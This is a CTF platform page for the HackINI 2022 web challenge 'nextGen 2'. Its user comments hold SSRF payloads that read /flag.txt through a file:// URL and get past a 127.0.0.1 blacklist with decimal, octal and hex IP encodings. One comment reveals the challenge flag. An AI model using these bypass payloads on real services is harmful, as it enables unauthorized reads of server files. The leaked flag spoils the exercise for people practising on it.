nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 906
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
bugku111222 21天前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0

零基础110 21天前

shellmates{**********}

回复 0

2ew123123124 22天前

shellmates{******}

回复 0

lunarbyside 1月前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 0

脆脆sha_ 7月前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 0

意大利炮 8月前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 3

MOCHAOLIN 10月前

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

868954104 1年前

shellmates{Y0u_d1D_1t_aG4iN_!!} service=file://2130706433/flag.txt

回复 0

aLo3er 1年前

payload:service= file://127.00.00.1/flag.txt

回复 1

rockking126 1年前

payload:service=file://2130706433/flag.txt 过滤的127.0.0.1用十进制代替。

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

luckylian 攻破了该题 13小时前
17335918325 攻破了该题 19小时前
2495280533 攻破了该题 1天前
swewjk 攻破了该题 1天前
buuble123 攻破了该题 2天前
人闲桂花落 攻破了该题 2天前
wsmemail 攻破了该题 3天前
18516952839 攻破了该题 4天前
渴死的鱼 攻破了该题 6天前
麦克凌云不会ctf 攻破了该题 7天前
知花实央 攻破了该题 7天前
周围有鬼 攻破了该题 9天前
1345736679 攻破了该题 10天前
paovspao 攻破了该题 12天前
百叶i 攻破了该题 13天前
bugkinn 攻破了该题 14天前
abcfdafda123 攻破了该题 14天前
李欣 攻破了该题 15天前
2912700095 攻破了该题 15天前
violetyy 攻破了该题 16天前
问题反馈